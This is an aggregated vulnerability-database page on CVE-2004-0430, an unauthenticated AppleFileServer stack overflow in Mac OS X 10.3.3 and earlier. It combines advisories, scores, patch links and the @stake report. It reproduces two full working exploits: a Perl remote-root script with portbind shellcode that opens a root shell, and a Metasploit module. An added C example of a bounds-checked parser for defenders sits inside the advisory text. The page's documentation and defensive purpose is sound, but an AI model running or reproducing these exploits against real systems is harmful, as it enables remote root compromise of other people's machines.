CVE-2004-0430
CVSS 5.1
Published: 2004-07-07 00:00:00
Last revised: 2008-09-05 16:38:25
NMCOEPS    

[Original] Stack-based buffer overflow in AppleFileServer for Mac OS X 10.3.3 and earlier allows remote attackers to execute arbitrary code via a LoginExt packet for a Cleartext Password User Authentication Method (UAM) request with a PathName argument that includes an AFPName type string that is longer than the associated length field.


[CNNVD] Apple Mac OS X AppleFileServer Pre-authentication Remote Buffer Overflow Vulnerability (CNNVD-200407-024)

        
AppleFileServer is the Apple file service used by Mac OS X.
AppleFileServer mishandles a 'LoginExt' packet that carries a malformed 'PathName' argument. A remote attacker can exploit this to trigger a buffer overflow and may execute arbitrary instructions with the privileges of the process.
The problem lies in the pre-authentication phase: the overflow occurs when a 'LoginExt' packet requesting the Cleartext Password User Authentication Method (UAM) arrives with a 'PathName' argument. The 'PathName' argument is encoded as one byte specifying the string type, two bytes specifying the string length, and then the string itself. If a string of type AFPName (0x3) is longer than the length declared in the packet, a buffer on the stack is overwritten, and carefully crafted data may execute arbitrary instructions with the privileges of the process.
        

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: HIGH [exploitation requires specific access conditions]
Access vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:apple:mac_os_x_server:10.3.3    Apple Mac OS X Server 10.3.3
cpe:/o:apple:mac_os_x:10.3.3    Apple Mac OS X 10.3.3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0430
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0430
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-024
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/648406
(UNKNOWN)  CERT-VN  VU#648406
http://xforce.iss.net/xforce/xfdb/16049
(VENDOR_ADVISORY)  XF  applefileserver-afp-pathname-bo(16049)
http://www.atstake.com/research/advisories/2004/a050304-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A050304-1
http://www.securiteam.com/securitynews/5QP0115CUO.html
(UNKNOWN)  MISC  http://www.securiteam.com/securitynews/5QP0115CUO.html
http://securitytracker.com/id?1010039
(UNKNOWN)  SECTRACK  1010039
http://secunia.com/advisories/11539
(UNKNOWN)  SECUNIA  11539
http://lists.apple.com/mhonarc/security-announce/msg00049.html
(UNKNOWN)  APPLE  APPLE-SA-2004-05-03

- Vulnerability information

Apple Mac OS X AppleFileServer Pre-authentication Remote Buffer Overflow Vulnerability
Medium  Boundary Condition Error
2004-07-07 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

Vendor patches:
Apple
-----
The vendor has released upgrade patches that fix this security issue; download them from the vendor's home page:
        Apple Mac OS X Server 10.2.8:
        Apple Patch SecUpdSrvr2004-05-03Jag.dmg
        
        http://download.info.apple.com/Mac_OS_X/061-1219.20040503.Zsw3S/2Z/SecUpdSrvr2004-05-03Jag.dmg

        Apple Mac OS X 10.2.8:
        Apple Patch SecUpd2004-05-03Jag.dmg
        
        http://download.info.apple.com/Mac_OS_X/061-1217.20040503.BmkY5/2Z/SecUpd2004-05-03Jag.dmg

        Apple Mac OS X 10.3.3:
        Apple Patch SecUpd2004-05-03Pan.dmg
        
        http://download.info.apple.com/Mac_OS_X/061-1213.20040503.vngr3/2Z/SecUpd2004-05-03Pan.dmg

        Apple Mac OS X Server 10.3.3:
        Apple Patch SecUpdSrvr2004-05-03Pan.dmg
        
        http://download.info.apple.com/Mac_OS_X/061-1215.20040503.mPp9k/2Z/SecUpdSrvr2004-05-03Pan.dmg

- Vulnerability information (391)

Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit (EDBID:391)
osX remote
2004-08-13 Verified
548 Dino Dai Zovi
N/A
#!/usr/bin/perl
# Priv8security com remote root exploit for AppleFileServer.
# PUBLIC VERSION!!!!
#
# Bug found by Dave G. and Dino Dai Zovi.
# URL: http://www.atstake.com/research/advisories/2004/a050304-1.txt
#
# [wsxz@localhost buffer]$ perl priv8afp.pl -h 10.4.12.199 -t 0
# -=[Priv8security.com Apple File Server remote root exploit!]=-
#
# [+] Using target: MacOSX 10.3.3
# [+] Using ret: 0xf0101cb0
# [+] Sending Request Opensession... DOne!
# [+] Got response packet:
# Flags: 1 Cmd: 4 ID: 31337
# [+] Sending FPloginEXT packet... DOne!
# [+] Waiting... We got in =)
#
# ****** Welcome to 'Adriano-Limas-Computer' ******
#
# Darwin Adriano-Limas-Computer.local 7.3.1 Darwin Kernel Version 7.3.1: Mon Mar
# 22 21:48:41 PST 2004; root:xnu/xnu-517.4.12.obj~2/RELEASE_PPC Power Macintosh powerpc
# uid=0(root) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty),
# 5(operator), 20(staff), 31(guest), 80(admin)
#
####################################################################
use IO::Socket;

use Getopt::Std; getopts('h:t:p:o:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'t'})) { $target = $args{'t'}; }
if (defined($args{'p'})) { $port = $args{'p'};}else{$port = 548;}
if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;}


my @targets = (
# description, ret, Magic size.
["MacOSX 10.3.3", 0xf0101cb0, 4], #tested on my ibook g4
);

print STDERR "-=[Priv8security.com Apple File Server remote root exploit!]=-\n\n";

if (!defined($host) || !defined($target)) {
Usage();
}

($desc,$ret,$msize) = @{$targets[$target]};

print STDERR "[+] Using target: $desc\n";
print STDERR "[+] Using ret: 0x" . sprintf('%lx', $ret + $offset) . "\n";

$shellcode = # portbind shellcode by br00t [at] blueyonder.co.uk
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x70".
"\x39\x80\x01\x70\x3b\xdf\xff\x88\x7c\xbe\x29\xae\x3b\xdf\xff\x89".
"\x7c\xbe\x29\xae\x3b\xdf\xff\x8a\x7c\xbe\x29\xae\x3b\xdf\xff\x8b".
"\x7c\xbe\x29\xae\x38\x6c\xfe\x92\x38\x8c\xfe\x91\x38\xac\xfe\x96".
"\x38\x0c\xfe\xf1\x44\xff\xff\x02\x60\x60\x60\x60\x7c\x67\x1b\x78".
"\x38\x9f\xff\x84\x38\xac\xfe\xa0\x38\x0c\xfe\xf8\x44\xff\xff\x02".
"\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x91\x38\x0c\xfe\xfa".
"\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x90".
"\x38\xac\xfe\x90\x38\x0c\xfe\xae\x44\xff\xff\x02\x60\x60\x60\x60".
"\x38\x8c\xfe\x90\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60".
"\x38\x8c\xfe\x91\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60".
"\x38\x8c\xfe\x92\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60".
"\x38\x0c\xfe\x92\x44\xff\xff\x02\x60\x60\x60\x60\x39\x1f\xff\x83".
"\x7c\xa8\x29\xae\x38\x7f\xff\x7c\x90\x61\xff\xf8\x90\xa1\xff\xfc".
"\x38\x81\xff\xf8\x38\x0c\xfe\xcb\x44\xff\xff\x02\x41\x41\x41\x41".
"\x41\x41\x41\x41\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\x02\x1b\x39".
"\x41\x41\x41\x41";

$bin_ret = reverse(pack('l', ($ret + $offset)));

$buffer = "\x60" x 141;
$buffer .= $bin_ret;
$buffer .= "\x60" x (824 - length($shellcode));
$buffer .= $shellcode;
$buffer .= "A" x 100;

$req =
"\x00\x04".# Request Opensession
"\x7a\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

$packet = 
"\x00". # Request
"\x02". # Command
"\x7a\x69".# leet ID
"\x00\x00\x00\x00".# Data Offset
"\x00\x00\x04\x00".# Length
"\x00\x00\x00\x00".# Reserved
"\x3f". # FPloginext
"\x00". # Pad
"\x00\x00". # Flags
"\x0e\x41\x46\x50\x56\x65\x72\x73\x69\x6f\x6e\x20\x32\x2e\x31".# Version
"\x10\x43\x6c\x65\x61\x72\x74\x78\x74\x20\x70\x61\x73\x73\x77\x72\x64". # UAM
"\x03". # Type
"\x00\x07". # User Len
"\x41\x64\x72\x69\x61\x6e\x6f" .# AFPNAME USER
"\x03". # Pathtype
"\x80\xff". # Path Len
$buffer. # Evil String
"\x00"; # Pad

$len = reverse(pack("S", $msize));

substr($packet, 63 , 2, $len);

$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port)
or die "[-] Cant connect: $!\n\n";

print STDERR "[+] Sending Request Opensession... ";

$f->send($req);
print STDERR "DOne!\n";

$f->recv($crap,128);
if($crap){
print STDERR "[+] Got response packet:\n";
parse_packet($crap);
}

print STDERR "[+] Sending FPloginEXT packet... ";
$f->send($packet);
print STDERR "DOne!\n";
print STDERR "[+] Waiting... ";

sleep(5);

$sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>6969,Type=>SOCK_STREAM,Reuse=>1)
or die "No luck :( $!\n\n";

print "We got in =)\n";

$sc->autoflush(1);

sleep(2);

print $sc "echo;echo \"****** Welcome to '`hostname -s`' ******\"\n";
print $sc "echo;uname -a;id;echo\n";

die "cant fork: $!" unless defined($pid = fork());

if ($pid) {
while(defined ($line = <$sc>)) {
print STDOUT $line;
}
kill("TERM", $pid);
}
else
{
while(defined ($line = <STDIN>)) {
print $sc $line;
}
}
close($sc);
print "Good bye!!\n";

sub parse_packet
{
my ($buf) = shift @_;
my (@packet);
my ($i);

for ($i=0;$i<length($buf);$i++)
{
push(@packet, substr($buf, $i, 1));
}

my ($flags) = unpack("C", @packet[0]);
my ($cmd) = unpack("C", @packet[1]);

my ($request_id) = unpack("n", @packet[2] . @packet[3]);
print " Flags: $flags Cmd: $cmd ID: $request_id\n";

}


sub Usage {

print STDERR "Options:
-h Victim ip.
-t Target number from list.
-p Port to attack.
-o Offset, try in steps of 500.\n\n";

print STDERR "Targets:\n";
for($i=0; $i < @targets; $i++){
($dd) = @{$targets[$i]};
print STDERR " $i - $dd\n";
}
print STDERR "\nUsage: perl $0 -h Victim -t target\n\n";
exit;
}

# milw0rm.com [2004-08-13]
		

- Vulnerability information (16863)

AppleFileServer LoginExt PathName Overflow (EDBID:16863)
osX remote
2010-09-20 Verified
0 metasploit
N/A
##
# $Id: loginext.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AppleFileServer LoginExt PathName Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the AppleFileServer service
				on MacOS X. This vulnerability was originally reported by Atstake and
				was actually one of the few useful advisories ever published by that
				company. You only have one chance to exploit this bug.
				This particular exploit uses a stack-based return address that will
				only work under optimal conditions.
			},
			'Author'         => 'hdm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2004-0430'],
					[ 'OSVDB', '5762'],
					[ 'BID', '10271'],
				],
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x20",
					'MinNops'  => 128,
					'Compat'   =>
						{
							'ConnectionType' => "+find"
						}
				},
			'Targets'        =>
				[
					# Target 0
					[
						'Mac OS X 10.3.3',
						{
							'Platform' => 'osx',
							'Arch'     => ARCH_PPC,
							'Ret'      => 0xf0101c0c # stack address :<
						},
					],
				],
			'DisclosureDate' => 'May 3 2004'))

		# Configure the default port to be AFP
		register_options(
			[
				Opt::RPORT(548),
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		path          = "\xff" * 1024
		path[168, 4]  = Rex::Arch.pack_addr(target.arch, target.ret)
		path[172, payload.encoded.length] = payload.encoded

		# The AFP header
		afp = "\x3f\x00\x00\x00"

		# Add the authentication methods
		["AFP3.1", "Cleartxt Passwrd"].each { |m|
			afp << [m.length].pack('C') + m
		}

		# Add the user type and afp path
		afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
		afp << "\x03" + [path.length].pack('n') + path

		# Add the data stream interface header
		dsi =
		[
			0,           # Flags
			2,           # Command
			rand(65536), # XID
			0,           # Data Offset
			afp.length,  # Data Length
			0            # Reserved
		].pack("CCnNNN") + afp

		sock.put(dsi)

		handler

		disconnect
	end

end
		

- Vulnerability information (F82304)

AppleFileServer LoginExt PathName Overflow (PacketStormID:F82304)
2009-10-28 00:00:00
H D Moore  metasploit.com
exploit,overflow
CVE-2004-0430

This Metasploit module exploits a stack overflow in the AppleFileServer service on MacOS X. This vulnerability was originally reported by Atstake and was actually one of the few useful advisories ever published by that company. You only have one chance to exploit this bug. This particular exploit uses a stack-based return address that will only work under optimal conditions.



    

- Vulnerability information (F34035)

priv8afp.pl (PacketStormID:F34035)
2004-08-13 00:00:00
wsxz  priv8security.com
exploit,remote,overflow,root,protocol
apple,osx
CVE-2004-0430

Remote root exploit for Mac OS X versions 10.3.3, 10.3.2, and 10.2.8 that makes use of the stack buffer overflow in the Apple Filing Protocol (AFP).

- Vulnerability information (F33249)

Atstake Security Advisory 04-05-03.1 (PacketStormID:F33249)
2004-05-07 00:00:00
David Goldsmith,Atstake,Dino Dai Zovi  atstake.com
advisory,overflow,root,protocol
apple,osx
CVE-2004-0430

Atstake Security Advisory A050304-1 - The AppleFileServer provides Apple Filing Protocol (AFP) services for both Mac OS X and Mac OS X server. AFP is a protocol used to remotely mount drives, similar to NFS or SMB/CIFS. There is a pre-authentication, remotely exploitable stack buffer overflow that allows an attacker to obtain administrative privileges and execute commands as root. Versions affected are Mac OS X 10.3.3, 10.3.2, and 10.2.8.




                                @stake, Inc.
                              www.atstake.com

                             Security Advisory

Advisory Name: AppleFileServer Remote Command Execution
 Release Date: 05/03/2004
  Application: AppleFileServer
     Platform: MacOS X 10.3.3 and below
     Severity: A remote attacker can execute arbitrary
               commands as root
      Authors: Dave G. <daveg@atstake.com>
               Dino Dai Zovi <ddaizovi@atstake.com>
Vendor Status: Informed, Upgrade Available
CVE Candidate: CAN-2004-0430
    Reference: www.atstake.com/research/advisories/2004/a050304-1.txt


Overview:

The AppleFileServer provides Apple Filing Protocol (AFP) services for
both Mac OS X and Mac OS X server.  AFP is a protocol used to
remotely mount drives, similar to NFS or SMB/CIFS.  There is a
pre-authentication, remotely exploitable stack buffer overflow that
allows an attacker to obtain administrative privileges and execute
commands as root. 


Details:

The AppleFileServer provides Apple Filing Protocol (AFP) services
for both Mac OS X and Mac OS X server.  AFP is a protocol used to
remotely mount drives, similar to NFS or SMB/CIFS.  AFP is not
enabled by default. It is enabled through the Sharing Preferences
section by selecting the 'Personal File Sharing' checkbox. 

There is a pre-authentication remotely exploitable stack buffer
overflow that allows an attacker to obtain administrative
privileges. The overflow occurs when parsing the PathName argument
from a LoginExt packet requesting authentication using the Cleartext
Password User Authentication Method (UAM).  The PathName argument
is encoded as one byte specifying the string type, two bytes
specifying the string length, and finally the string itself.  A
string of type AFPName (0x3) that is longer than the length declared
in the packet will overflow the fixed-size stack buffer.

The previously described malformed request results in a trivially
exploitable stack buffer overflow.  @stake was able to quickly
develop a proof-of-concept exploit that portably demonstrates this
vulnerability across multiple Mac OS X versions including Mac OS X
10.3.3, 10.3.2, and 10.2.8.
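The checked parser below is an added example written for this page; it is not AppleFileServer code and not taken from any of the exploits listed here. It follows the argument encoding that the CNNVD summary and the Details section above describe (one type byte, a two-byte big-endian length, then the string) and enforces the two bounds a server-side parser must check before copying into a fixed stack buffer: the declared length has to fit the bytes actually received, and it has to fit the destination. PATHNAME_MAX, the function names and the 'A'-filled sample arguments are assumptions constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define AFP_NAME_TYPE 0x03  /* string type "AFPName" named in the advisory */
#define PATHNAME_MAX  255   /* assumed destination size; the server's real size is not on the page */

enum afp_status {
    AFP_ERR_SHORT              = -1,  /* fewer than 3 header bytes present */
    AFP_ERR_TYPE               = -2,  /* not an AFPName argument */
    AFP_ERR_LEN_EXCEEDS_PACKET = -3,  /* declared length runs past the data received */
    AFP_ERR_LEN_EXCEEDS_DEST   = -4,  /* declared length does not fit the destination */
    AFP_ERR_BAD_CASE           = -99  /* test-case construction error, not a parse result */
};

/* Parse one type/length/string argument from buf. On success the string is
 * NUL-terminated in dst and the number of bytes consumed (3 + length) is
 * returned; otherwise a negative afp_status is returned and dst is untouched.
 * Skipping either length check gives the bug shape the advisory describes:
 * the copy is then bounded by attacker-supplied data rather than by dst. */
int afp_parse_pathname(const uint8_t *buf, size_t buf_len,
                       char *dst, size_t dst_cap, uint8_t *type_out)
{
    if (buf_len < 3)
        return AFP_ERR_SHORT;
    if (buf[0] != AFP_NAME_TYPE)
        return AFP_ERR_TYPE;
    size_t declared = ((size_t)buf[1] << 8) | buf[2];  /* big-endian u16 */
    if (declared > buf_len - 3)   /* check 1: fits what actually arrived */
        return AFP_ERR_LEN_EXCEEDS_PACKET;
    if (declared >= dst_cap)      /* check 2: fits dst together with its NUL */
        return AFP_ERR_LEN_EXCEEDS_DEST;
    memcpy(dst, buf + 3, declared);
    dst[declared] = '\0';
    if (type_out)
        *type_out = buf[0];
    return (int)(3 + declared);
}

/* Parses a well-formed 7-byte AFPName ("Adriano", the user-name field shape
 * seen in the public exploit) into a PATHNAME_MAX buffer; 1 if parsed intact. */
int check_user_name(void)
{
    const uint8_t arg[] = { 0x03, 0x00, 0x07, 'A', 'd', 'r', 'i', 'a', 'n', 'o' };
    char dst[PATHNAME_MAX + 1];
    uint8_t type = 0;
    int n = afp_parse_pathname(arg, sizeof arg, dst, sizeof dst, &type);
    return n == 10 && type == AFP_NAME_TYPE && strcmp(dst, "Adriano") == 0;
}

/* Builds a constructed argument whose header declares `declared` bytes while
 * `actual` filler bytes follow it, then parses into a dst_cap-byte buffer.
 * Returns whatever afp_parse_pathname returns. */
int check_case(uint16_t declared, size_t actual, size_t dst_cap)
{
    uint8_t pkt[4096];
    char dst[4096];
    if (actual > sizeof pkt - 3 || dst_cap > sizeof dst)
        return AFP_ERR_BAD_CASE;
    pkt[0] = AFP_NAME_TYPE;
    pkt[1] = (uint8_t)(declared >> 8);
    pkt[2] = (uint8_t)(declared & 0xff);
    memset(pkt + 3, 'A', actual);
    return afp_parse_pathname(pkt, 3 + actual, dst, dst_cap, NULL);
}

int main(void)
{
    printf("user name intact:            %d\n", check_user_name());
    printf("7 declared / 7 sent:         %d\n", check_case(7, 7, PATHNAME_MAX + 1));
    printf("0x80ff declared / 1024 sent: %d\n", check_case(0x80ff, 1024, PATHNAME_MAX + 1));
    printf("1024 declared / 1024 sent:   %d\n", check_case(1024, 1024, PATHNAME_MAX + 1));
    return 0;
}
```

The 0x80ff and 1024 cases mirror the length values the two published exploits place in the PathName header; both are rejected before any copy happens.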


Vendor Response:

- From APPLE-SA-2004-05-03 Security Update 2004-05-03

AppleFileServer: Fixes CAN-2004-0430 to improve the handling of long
passwords. Credit to Dave G. from @stake for reporting this issue.

Security Update 2004-05-03 may be obtained from:

  * Software Update pane in System Preferences

  * Apple's Software Downloads web site:

    For Mac OS X 10.3.3 "Panther"
    =============================
    http://download.info.apple.com/Mac_OS_X/061-1213.20040503.vngr3/2Z/SecUpd2004-05-03Pan.dmg
    The download file is named: "SecUpd2004-05-03Pan.dmg"
    Its SHA-1 digest is: 6f35539668d80ee536305a4146bd982a93706532
   
    For Mac OS X Server 10.3.3
    ==========================
    http://download.info.apple.com/Mac_OS_X/061-1215.20040503.mPp9k/2Z/SecUpdSrvr2004-05-03Pan.dmg
    The download file is named: "SecUpdSrvr2004-05-03Pan.dmg"
    Its SHA-1 digest is: 3c7da910601fd36d4cdfb276af4783ae311ac5d7
   
    For Mac OS X 10.2.8 "Jaguar"
    =============================
    http://download.info.apple.com/Mac_OS_X/061-1217.20040503.BmkY5/2Z/SecUpd2004-05-03Jag.dmg
    The download file is named: "SecUpd2004-05-03Jag.dmg"
    Its SHA-1 digest is: 11d5f365e0db58b369d85aa909ac6209e2f49945
   
    For Mac OS X Server 10.2.8
    ==========================
    http://download.info.apple.com/Mac_OS_X/061-1219.20040503.Zsw3S/2Z/SecUpdSrvr2004-05-03Jag.dmg
    The download file is named: "SecUpdSrvr2004-05-03Jag.dmg"
    Its SHA-1 digest is: 28859a4c88f6e1d1fe253388b233a5732b6e42fb


Timeline

3/26/2004 Vendor notified of issue
5/04/2004 Vendor informs us that they have a patch available
4/04/2004 Advisory released


Recommendation:

If you do not need AFS, disable it.  If you do need it, upgrade to
the latest version of Panther. 


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

  CAN-2004-0430  AppleFileServer Remote Command Execution


Open Source Vulnerability Database (OSVDB) Information:
More information available at www.osvdb.org

  OSVDB ID 5762


@stake Vulnerability Reporting Policy:
http://www.atstake.com/research/policy/

@stake Advisory Archive:
http://www.atstake.com/research/advisories/

PGP Key:
http://www.atstake.com/research/pgp_key.asc

Copyright 2004 @stake, Inc. All rights reserved.






    

- Vulnerability information

5762
Apple Mac OS X AppleFileServer Pre-Authentication Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Patch / RCS
Exploit Public Vendor Verified

- Vulnerability description

MacOS X contains a flaw that may allow a remote attacker to gain administrative privileges. The issue is due to a stack buffer overflow in the pre-authentication routine. The overflow occurs when the PathName argument from the LoginExt packet requests authentication using the Cleartext Password User Authentication Method (UAM). With a specially crafted request, an attacker can gain full administrative privilege over the machine remotely.

- Timeline

2004-05-03 2004-03-26
2004-08-15 Unknown

- Solution

Apple has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable AFS if not essential.

For Mac OS X 10.3.3 "Panther"
http://download.info.apple.com/Mac_OS_X/061-1213.20040503.vngr3/2Z/SecUpd2004-05-03Pan.dmg

For Mac OS X Server 10.3.3
http://download.info.apple.com/Mac_OS_X/061-1215.20040503.mPp9k/2Z/SecUpdSrvr2004-05-03Pan.dmg

For Mac OS X 10.2.8 "Jaguar"
http://download.info.apple.com/Mac_OS_X/061-1217.20040503.BmkY5/2Z/SecUpd2004-05-03Jag.dmg

For Mac OS X Server 10.2.8
http://download.info.apple.com/Mac_OS_X/061-1219.20040503.Zsw3S/2Z/SecUpdSrvr2004-05-03Jag.dmg


- Vulnerability information

Apple Mac OS X AppleFileServer Remote Buffer Overflow Vulnerability
Boundary Condition Error 10271
Yes No
2004-05-03 12:00:00 2009-07-12 04:07:00
Discovery is credited to @stake, Inc. <www.atstake.com>.

- Affected software versions

Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3
Apple Mac OS X Server 10.2.8
Apple Mac OS X Server 10.2.7
Apple Mac OS X Server 10.2.6
Apple Mac OS X Server 10.2.5
Apple Mac OS X Server 10.2.4
Apple Mac OS X Server 10.2.3
Apple Mac OS X Server 10.2.2
Apple Mac OS X Server 10.2.1
Apple Mac OS X Server 10.2
Apple Mac OS X 10.3.3
Apple Mac OS X 10.3.2
Apple Mac OS X 10.3.1
Apple Mac OS X 10.3
Apple Mac OS X 10.2.8
Apple Mac OS X 10.2.7
Apple Mac OS X 10.2.6
Apple Mac OS X 10.2.5
Apple Mac OS X 10.2.4
Apple Mac OS X 10.2.3
Apple Mac OS X 10.2.2
Apple Mac OS X 10.2.1
Apple Mac OS X 10.2

- Discussion

It has been reported that AppleFileServer is prone to a remote buffer overflow vulnerability that may allow a remote attacker to execute arbitrary code in order to gain unauthorized access. The issue presents itself when the application receives a 'LoginExt' packet containing a malformed 'PathName' argument.

Apple Mac OS X 10.3.3 and prior are reported to be prone to this issue.

This issue was previously disclosed in a multiple BID 10268 (Apple OS X Multiple Unspecified Large Input Vulnerabilities), however, it is being assigned a new BID as a result of new information available.

- Exploit

An Exploit has been released for this issue as part of the Metasploit Framework project version 2.2. Various other exploits have been released as well. Please see the Metasploit exploits site in Web references for more information.

An additional exploit (priv8afp.pl) has been released.

- Solution

Apple has released security advisory APPLE-SA-2004-05-03 dealing with this and other issues. Please see the referenced advisory for more information.


Apple Mac OS X 10.2.8

Apple Mac OS X Server 10.2.8

Apple Mac OS X Server 10.3.3

Apple Mac OS X 10.3.3


 

 
